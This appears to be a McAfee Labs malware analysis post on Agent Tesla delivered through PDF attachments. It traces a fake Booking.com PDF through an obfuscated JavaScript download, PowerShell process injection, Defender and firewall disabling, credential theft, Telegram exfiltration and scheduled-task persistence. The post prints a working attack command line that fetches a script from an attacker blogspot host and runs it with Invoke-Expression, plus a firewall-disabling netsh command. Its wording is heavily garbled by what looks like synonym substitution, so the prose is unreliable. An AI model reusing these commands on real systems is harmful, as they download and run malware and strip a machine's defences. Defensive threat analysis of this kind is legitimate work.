Rise in Misleading PDF: The Gateway to Malicious Payloads

Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has lately noticed a major surge within the distribution of outstanding malware via PDF information. Malware is just not solely sourced from doubtful web sites or downloads; sure cases of malware might reside inside apparently innocent emails, significantly throughout the PDF file attachments accompanying them. The following pattern noticed prior to now three months via McAfee telemetry pertains to the prevalence of malware distributed via non-portable executable (non-PE) vectors.

Determine 1: Rise in PDF malware

Why PDF?

Upon implementing Microsoft‘s macro-blocking measures for Web-delivered Workplace information, risk actors have been compelled to plot different strategies for e mail malware distribution. The advanced construction of PDF information renders them prone to exploitation, posing vital challenges in detecting malicious content material inside. As a generally employed file format distributed by way of e mail attachments within the client area, PDFs symbolize an attractive avenue for attackers to deceive customers into believing they’re benign. Exploiting this belief, attackers can readily craft PDF-based malware, usually containing payloads hosted on malicious web sites. Upon person interplay, akin to clicking a hyperlink, these PDFs obtain the hosted payload, exacerbating the danger of an infection.

An infection Chain

This rising an infection chain involving, amongst others, Agent Tesla, initiates from an e mail containing a PDF attachment, which subsequently facilitates the dissemination of the final word payload. Within the outdated and unpatched model of Acrobat Reader, PDFs immediately execute embedded JavaScript utilizing MSHTA, subsequently launching PowerShell, which facilitates course of injection. Conversely, within the newest model of Acrobat Reader, PDFs are unable to execute JavaScript immediately. As a substitute, they redirect to a malicious web site, from which the script is downloaded. The following course of stays in keeping with the earlier case. The kill chain for the supply of Agent Tesla unfolds as follows:

Determine 2: An infection Chain

Preliminary Entry:

Firstly, we will deal with the situation involving the up to date model of Acrobat Reader, as it’s probably that almost all of customers may have this model put in. Sometimes, these PDF information are disguised underneath numerous themes akin to invoices that includes a outstanding obtain button, messages prompting instant motion, or buttons designed to redirect customers to seemingly benign locations.

In a latest assault, a file named “Reserving.com-1728394029.pdf” was used. It’s evidently focusing on customers underneath the guise of being affiliated with Reserving.com. It shows a immediate stating, “Lettore non è compatibile!”, which interprets to “Participant is just not suitable,” as depicted within the offered Determine beneath.

Determine 3: Face of PDF attachment

Upon analyzing the inner construction of the PDF (Determine 4), it was found that inside one of many seven objects, some hex information and an embedded URL have been recognized. The URL highlighted within the crimson field “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to cover malicious hyperlinks, making them more durable to detect. That is particularly helpful in phishing schemes the place they trick customers into revealing delicate info. Bitly’s dynamic hyperlinks permit attackers to vary locations, enhancing their skill to evade detection. Moreover, attackers exploit the belief related to Bitly to enhance the success of their social engineering ways.

This URL is meant to connect with https://bio0king[.]blogspot[.]com

Determine 4: Embedded information in PDF

The textual content in yellow highlighted in Determine 4, seems to be in hexadecimal format. Upon changing it to ASCII, the result’s as follows:

Determine 5: ASCII Conversion

That is the explanation behind the immediate noticed in Determine 3, displaying the identical alert message upon opening the PDF doc.

After clicking “OK,” one other immediate appeared from Adobe Participant, cautioning in regards to the connection established to the deal with talked about within the immediate i.e. “bit.ly”.

Determine 6: Connection to embedded URL

Upon granting permission for redirection, the person is directed to the web site “https://bio0king[.]blogspot[.]com”. Thus, an try is made to disguise itself as a official Reserving.com web site. As illustrated within the determine beneath, Microsoft Defender SmartScreen alerts the person to the dangerous nature of this web site. Regardless of the warning, additional evaluation was performed by continuing to the web site to watch subsequent actions.

Determine 7: Connection to disguised web site

Upon accessing the web site, it was noticed {that a} JavaScript file named “Reserving.com-1728394029.js” was promptly downloaded. The js file was deliberately named identically to the PDF file in an effort to deceive customers into opening it.

Determine 8: Immediate of JS file obtain

Instantly upon initiating the obtain, redirection is triggered to the official Reserving.com web site, aiming to stop customers from detecting any suspicious exercise. The downloaded file is saved within the Downloads folder on the person’s system.

Determine 9: JS file downloaded

The content material of the JavaScript file is closely obfuscated. This tactic is often employed by attackers to hide their code, thus complicating evaluation efforts and evading detection mechanisms.

Determine 10: JS file content material

Execution:

Upon executing the JavaScript, the next course of tree was noticed:

Determine 11: Course of tree

Command line:

• “C:WindowsSystem32WScript.exe” ” C:UsersadminDownloads Reserving.com-1728394029.js”
  • “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . (‘i*x’).exchange(‘*’,’e’);Begin-Sleep -Seconds 5
    • ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
    • “C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe” /noconfig /fullpaths @”C:UsersadminAppDataLocalTempmk2qsd2s.cmdline”
      • C:WindowsMicrosoft.NETFramework64v4.0.30319cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:UsersadminAppDataLocalTempRES6D2D.tmp” “c:UsersadminAppDataLocalTempCSC7C83DF075A344945AED4D733783D6D80.TMP”
    • “C:Windowssystem32netsh.exe” advfirewall set allprofiles state off -ErrorAction SilentlyContinue
    • “C:WindowsMicrosoft.NETFrameworkv4.0.30319RegSvcs.exe”

Upon decoding and executing “Reserving.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”

Utilizing the PowerShell command line, an try was made to entry the file positioned at htloctmain25.blogspot.com/////////////////////////atom.xml, adopted by executing the file utilizing Invoke-Expression (iex). On this occasion, the attackers tried to obfuscate the Invoke-Expression (iex) command by utilizing the exchange command throughout the PowerShell command line. As illustrated within the command line, a sleep command was carried out, pausing execution for five seconds. Subsequent phases of the an infection proceeded after this interval.

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is called atom.ps1, measuring roughly 5.5 MB in measurement. The determine beneath depicts the content material of the file:

Determine 12: Content material of .ps1 file

Let’s start deciphering this script proven in Determine 11 with reference:

The Crimson marked content material on the high of the script signifies that it’s going to terminate a number of specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the ultimate payload into considered one of these official binaries. Moreover, the script creates a listing at “C:ProgramDataMINGALIES” for potential future utilization.

The Blue marked content material throughout the script represents the decryption perform, labeled as “asceeeeeeeeeeeeeeee”. This perform is subsequently employed to decrypt numerous variables throughout the script.

The Inexperienced marked content material in the direction of the tip of the script outlines the implementation of the persistence mechanism and describes the injection course of into official executables.

For reference and ease of comprehension, the variables outlined within the script have been numbered accordingly. The decryption directions for these variables are highlighted in Yellow for readability and emphasis.

Following the sequence of directions, if any of the required processes are terminated, the script proceeds to outline variables 1 and a pair of. Subsequently, the decryption loop is outlined within the script. After the decryption loop, variable 3, named “Phudigum”, is outlined within the script. Following that, the script decrypts variable 3 and executes the obtained decoded information utilizing the Invoke-Expression (IEX) command.

Protection Evasion:

The content material of the decoded variable 3 is as follows:

Determine 13: Variable 3 after decryption

The code first bypasses the Microsoft Home windows Anti-Malware Scan Interface (AMSI) scanning by setting a selected worth after which proceeds to create registry entries for persistence. The script additionally defines capabilities for interacting with the system’s reminiscence and units international error motion preferences to silently proceed, suppressing any errors. It checks if a kind named AMSIReaper exists and if not, defines this kind with numerous declarations for interacting with the Home windows kernel32.dll, together with capabilities associated to course of reminiscence manipulation.

Moreover, the script executes a sequence of malicious actions aimed toward compromising the safety of the system. It begins by including exclusions for particular file extensions, paths, and processes in Home windows Defender, successfully evading detection for this stuff. Subsequently, it makes an attempt to change numerous Home windows Defender preferences, akin to disabling essential safety features just like the Intrusion Prevention System, Actual-time Monitoring, and Script Scanning, whereas additionally adjusting settings associated to risk actions and reporting. Moreover, the script tries to change registry settings related to Person Account Management (UAC) and disable the Home windows Firewall, additional weakening the system’s defenses. Lastly, it resets the worldwide error motion choice to proceed, doubtlessly concealing any errors encountered throughout execution and making certain the script’s malicious actions stay undetected. General, these actions point out a concerted effort to compromise the system’s safety and doubtlessly allow additional malicious actions.

Privilege Escalation:

The following instruction in Determine 11 includes decrypting variable 2, labeled as “bulgumchupitum,” using the decryption perform “asceeeeeeeeeeeeeeee.” And the identical is executed by Invoke-Expression (IEX) command. Following is the decoded content material of variable 2:

Determine 14: Variable 2 after decryption

The content material obtained after decrypting variable 2 holds vital significance. The highlighted part in Crimson does the next:

• Introduces one other decryption perform particularly tailor-made for this script, named “kimkarden.”
• Moreover, the variable “muthal,” marked as variable 1 in Determine 11, is utilized inside this script relatively than in the principle .ps1 file.
• Moreover, one other variable is outlined, and its content material is saved within the variable “pinchs.”
• Lastly, the content material of each variables, “muthal” and “pinchs,” is decrypted utilizing the decryption perform “kimkarden” and saved as byte arrays in information 1 and information 2, marked as 5 and 6, respectively, in Determine 13.
• Knowledge 1 and Knowledge 2 are discovered to be .NET executables

The subsequent part marked Blue in Determine 13, does the next:

• After a short sleep, the script hundreds an meeting utilizing the decoded content material, information 1, and executes a command via reflection.
• The script defines a perform named ExecuteCommand, which makes use of reflection to dynamically invoke methodology ‘C’ from a kind named ‘A.B’ loaded from an meeting.
• It defines paths to numerous .NET framework executables (RegSvcs.exe for variations 2.0 and 4.0, and Msbuild.exe for model 3.5).
• It invokes the $invokeMethod with the $nullArray and parameters: the trail of .NET framework executables and $data2 (decoded byte array).

Course of Injection:

Determine 15: Knowledge 1

Knowledge 1 contains a .NET DLL file. As beforehand indicated, the script invokes the strategy ‘C’ from the kind named ‘A.B’. Regardless of the excessive stage of obfuscation within the file proven in Determine 15, the presence of methodology ‘C’ will be noticed (highlighted in yellow). Moreover, throughout the script, there’s a particular perform the place the trail to framework executables and information are being handed (highlighted throughout the crimson field).

Determine 16: Knowledge 1 dll

This DLL is liable for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe course of. The next determine exhibits the configuration of data2. The depicted configuration of data2 disguises it as a official McAfee package deal file proven in Determine 16. Nonetheless, it lacks a legitimate certificates, indicating its fraudulent nature.

Determine 17: Data2

The executable file reveals a excessive diploma of obfuscation, rendering its content material largely unreadable. Quite a few strategies are current, every bearing meaningless names, a deliberate tactic employed to impede evaluation by researchers.

Determine 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation course of. Every string undergoes decryption via a sequence of directions, with particular parameters being handed to acquire the deciphered content material. This meticulous method is designed so as to add layers of complexity and hinder simple evaluation. As an illustration, in Determine 18, via reverse engineering, we are able to observe the way it begins querying the browser for info. The highlighted instruction is the one which after decrypting provides the trail of the Opera browser.

Determine 19: Fetching browser info

The next ProcMon logs present all of the broswers the malware queried:

Determine 20: Procmon logs of browsers(1)

Determine 21: Procmons logs for browsers(2)

Credential Entry:

Along with this, it steals delicate info akin to browser historical past, cookies, credentials, SMTP info, session info, and e mail consumer information akin to Otlook profiles, and so on.

Determine 22: Credentials

Exfiltration:

By means of debugging the code, we have been in a position to uncover the area it was using for exfiltration. The next determine exhibits the URL used for exfiltration:

Determine 23: Area obtained

The identical was evident from Procmon logs proven within the Determine beneath:

Determine 24: Procmon logs of Connection for exfiltration

The DNS file of IP deal with 149.154.167.220 belongs to Telegram messenger.

Determine 25: DNS file

AgentTesla leverages Telegram bots for information exfiltration resulting from a number of advantageous elements. Firstly, Telegram gives strong end-to-end encryption, making certain the safety of transmitted information. Secondly, the platform presents anonymity for bot creators, enhancing the stealth of malicious actions. Thirdly, Telegram’s user-friendly interface simplifies communication processes for each attackers and their command-and-control infrastructure. Moreover, since Telegram is a extensively used messaging platform, visitors to its servers might seem much less suspicious in comparison with different channels, aiding in evading detection. Furthermore, Telegram’s infrastructure resilience makes it a dependable choice for sustaining communication channels even amidst takedown efforts.

General, the mixture of safety, anonymity, ease of use, stealth, and resilience makes Telegram bots an interesting alternative for AgentTesla’s information exfiltration ways. And to attain this, it establishes contact with the respective area related to the bot and transmits the info, which is then tracked by a selected bot ID.

Determine 26: TelegramBot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving official .NET executable paths, performing course of injection to execute the malware, accumulating information, and in the end exfiltrating the acquired info.

Persistence:

Shifting ahead with atom.ps1 (Determine 11), the subsequent is variable 4, labeled as “koaskodkwllWWW”, and is decrypted utilizing the perform “asceeeeeeeeeeeeeeee”. Upon decryption, the content material is decoded as follows:

Determine 27: Variable 4 decoded

This script establishes persistence by:

1. Creating an HTA script to execute PowerShell instructions fetched remotely. The script incorporates JavaScript code that makes use of ActiveX objects to execute instructions. Particularly, it creates an occasion of WScript.Shell to run a PowerShell command fetched from a distant location (linkcomsexi).
2. It registers a scheduled process named “Tnamesexi” using Register-ScheduledTask. The duty is about to set off as soon as at a selected time, calculated by including a sure variety of minutes (mynsexi) to the present time.
3. Lastly, it units a registry worth underneath the present person’s Run key (HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun). This registry worth, named “Tnamesexi,” is configured to execute the command schtasks /run /tn $taskName, thereby manually triggering the scheduled process established within the previous step.

In the end, the content material highlighted in inexperienced in Determine 11 performs the ultimate process. The directions are as follows:

Determine 28: Persistence directions

Now, after substituting the values:

• “mynsexi” is about to “213”, indicating that the script shall be executed once more after 213 minutes.
• “Tnamesexi” is outlined as “chromeupdateri”, implying {that a} Run entry shall be created underneath this identify.
• “linkcomsexi” is assigned the worth “htljan62024.blogspot.com//////////atom.xml”, suggesting that the atom.ps1 file shall be fetched once more from this URL.

We inspected registry entries and scheduled process entries for cross-verification. And the script did as directed:

Determine 29: Registry entry for Persistence

Determine 30: Job Scheduler

Determine 31: Procmon logs for persistence

In abstract, the script is configured to execute once more after 213 minutes, making a Run entry named “chromeupdateri” and fetching the atom.ps1 file once more from “htljan62024.blogspot.com//////////atom.xml”.

Execution with outdated and unpatched model of Acrobat Reader:

Upon opening the PDF within the outdated, unpatched model of Acrobat Reader, a immediate instantly appeared indicating the launch of MSHTA together with your entire JavaScript code contained therein. That is depicted within the determine beneath.

Determine 32: Immediate for embedded javascript

Upon analyzing the streams of the PDF, we found the an identical script embedded throughout the doc:

Determine 33: Embedded javascript in PDF

After the launch of MSHTA, an occasion of PowerShell is invoked, initiating course of injection into Regsvcs.exe and injection of AgentTesla. Consequently, using an outdated and unpatched model of Acrobat Reader, interplay with the PDF is pointless; mere opening of the PDF file ends in system an infection by the malware.

Abstract:

The chain of occasions initiates with the supply of a PDF file containing malicious content material. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, resulting in the obtain and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, within the type of a .NET DLL file, which injects AgentTesla payload into official processes to evade detection. The malware communicates with command-and-control servers, exfiltrating delicate information via Telegram bots for stealthy transmission. To make sure persistence, the malware establishes scheduled duties and registry entries, permitting it to execute periodically and preserve its presence on the contaminated system. Within the outdated model of Acrobat Reader, opening the PDF triggered the automated execution of malicious JavaScript, resulting in the injection of AgentTesla malware by way of PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, additional confirming the exploitation of vulnerabilities with out requiring person interplay. This orchestrated sequence underscores the subtle nature of the assault, spanning from preliminary an infection to information exfiltration and chronic infiltration, posing vital challenges for detection and mitigation efforts.

Mitigation:

Avoiding falling sufferer to e mail phishing includes adopting a vigilant and cautious method. Listed here are some widespread practices to assist forestall falling prey to e mail phishing:

• Confirm Sender Data
• Assume Earlier than Clicking Hyperlinks and Warnings
• Test for Spelling and Grammar Errors
• Be Cautious with E mail Content material
• Confirm Uncommon Requests
• Use E mail Spam Filters
• Test for Safe HTTP Connections
• Delete Suspicious Emails
• Maintain Home windows and Safety Software program Updated
• Use the newest and patched model of Acrobat reader

Indicators of Compromise (IOCs)

Desk 1: Indicators of Compromise

Introducing McAfee+

Identification theft safety and privateness in your digital life

Obtain McAfee+ Now